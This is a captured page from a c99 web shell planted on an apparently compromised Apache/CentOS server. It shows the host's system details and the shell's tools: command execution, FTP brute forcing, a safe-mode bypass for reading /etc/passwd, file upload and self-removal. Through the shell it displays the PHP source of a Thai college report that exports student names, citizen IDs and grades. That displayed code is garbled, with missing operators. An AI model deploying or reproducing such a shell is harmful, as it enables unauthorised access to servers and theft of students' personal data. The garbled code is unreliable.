!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_rptRis207.php (4.39 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
header
('Content-type: application/xls');
header('Content-Disposition: attachment; filename="testing.xls"');

?>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<table width="700" align="center" border="0" cellpadding="0" cellspacing="1">
    <tr>
        <td width="50"><img src="<?php echo base_url().$this->config->item('rg_upload_picture').$cfgClgLogo;?>" width="111" height="95" align="absmiddle" border="0"></td>
        <td width="450"><font size="2"><b><?php echo $cfgClgName;?><br><?php echo $cfgSiteName;?></b></font></td>
        <td width="200" align="right" valign="top"><font size="2"><b>RIS207</b></font></td>        
    </tr>
    <tr valign="top">
        <td align="center" colspan="3"><hr color="#000000" noshade><br></td>
    </tr>
    <tr>
        <td colspan="3" height="22" align="center"><font size="3"><b>ตารางข้อมูลผลสัมฤทธิ์ทางการเรียนของนักศึกษา ประจำปีการศึกษา
        <?php echo $acadYear;?></b></font></td>
    </tr>
    <tr>
        <td colspan="3" height="22"></td>
    </tr>
    <tr>
        <td colspan="3" height="22"><font size="2"><?php echo $cfgSiteName;?></font></td>
    </tr>
<?php
//    $oPg->SearchByKey($programId);
//    $oPg->GetRecord();
        
if($qu_cur->num_rows()) {
            
$row_cur $qu_cur->row();
            
$curName $row_cur->curName;
        }else{
            
$curName "";
        }
?>
    <tr>
        <td colspan="3" height="22"><font size="2">หลักสูตร<?php echo $curName;?></font></td>
    </tr>
    <tr>
        <td colspan="3"><table border="1" cellspacing="0" cellpadding="0" bordercolor="#000000" style="border-collapse: collapse" align="center">
            <tr>
                <td rowspan="2" align="center"><font size="2"><b>ลำดับที่</b></font></td>
                <td rowspan="2" align="center"><font size="2"><b>รหัสนักศึกษา</b></font></td>
                <td rowspan="2" align="center"><font size="2"><b>ชื่อ-สกุล</b></font></td>
                <td rowspan="2" align="center"><font size="2"><b>ชั้นปี</b></font></td>
                <td rowspan="2" align="center"><font size="2"><b>เลขประจำตัวประชาชน<br>(13 หลัก)</b></font></td>
                <td rowspan="2" align="center"><font size="2"><b>โควตาจังหวัด/กรม</b></font></td>
                <td rowspan="2" align="center"><font size="2"><b>ภูมิลำเนาจังหวัดตามทะเบียนบ้าน</b></font></td>
                <td colspan="4" align="center"><font size="2"><b>คะแนนผลสัมฤทธิ์ทางการเรียน (ทศนิยม 2 ตำแหน่ง)</b></font></td>
            </tr>
            <tr>
<?php
            
foreach($rs_ter->result() as $row){
?>
                <td height="22" align="center"><font size="2"><b><?php echo $row->tmName;?></b></font></td>
<?php
            
}
?>
                <td align="center"><font size="2"><b>เฉลี่ยสะสม</b></font></td>
            </tr>
<?php
            $i 
0;
        if(
$rs_std->num_rows()){
            foreach(
$rs_std->result() as $row){
?>
            <tr>
                <td align="center"><font size="2"><?php echo $i+1;?></font></td>
                <td align="center"><font size="2"><?php echo $row->stdCode;?></font></td>
                <td><font size="2"><?php echo $row->prefixName.$row->stdName.' '.$row->stdSurname;?></font></td>
                <td align="center"><font size="2"><?php echo $row->stdSyId;?></font></td>
                <td align="center"><font size="2">=T("<?php echo $row->sdtCitizenId;?>")</font></td>
                <td><font size="2"><?php echo $row->soName.' '.$row->provinceName;?></font></td>
                <td><font size="2"><?php echo $prv_name;?></font></td>
<?php
                
foreach($rs_ter->result() as $row2){
                    
$ssCon = array('ssmStdId' => $row->stdId 'ssmAcY' => $acadYear 'ssmTmId' => $row2->tmId);
                    
$ssOrder = array('ssmGPAX' => '');
                    
$row_ss $ss->qrySsm($ssCon,$ssOrder,'')->row();
                    if(
$row_ss){
                        
$GPA $row_ss->ssmGPA;
                    }else{
                        
$GPA 0;
                    }
?>
                <td align="right"><font size="2">=T("<?php echo number_format($GPA2);?>")</font></td>
<?php
                
}
?>
                <td align="right"><font size="2">
                =T("<?php
                $num1 
$rgd->GetDividendAYRGPA($row->stdId,$acadYear);
                
$num2 $rgd->GetAllFDivisorAYRGPAX($row->stdId,$acadYear);
                
$res_num = ($num2 != "" || $num2 != || $num1 != "" || $num1 != 0)?$num1/$num2:'0';
                echo 
number_format($res_num2);
                
?>")
                </font></td>
            </tr>
<?php
                $i
++;
            }
        }
?>
        </table></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0066 ]--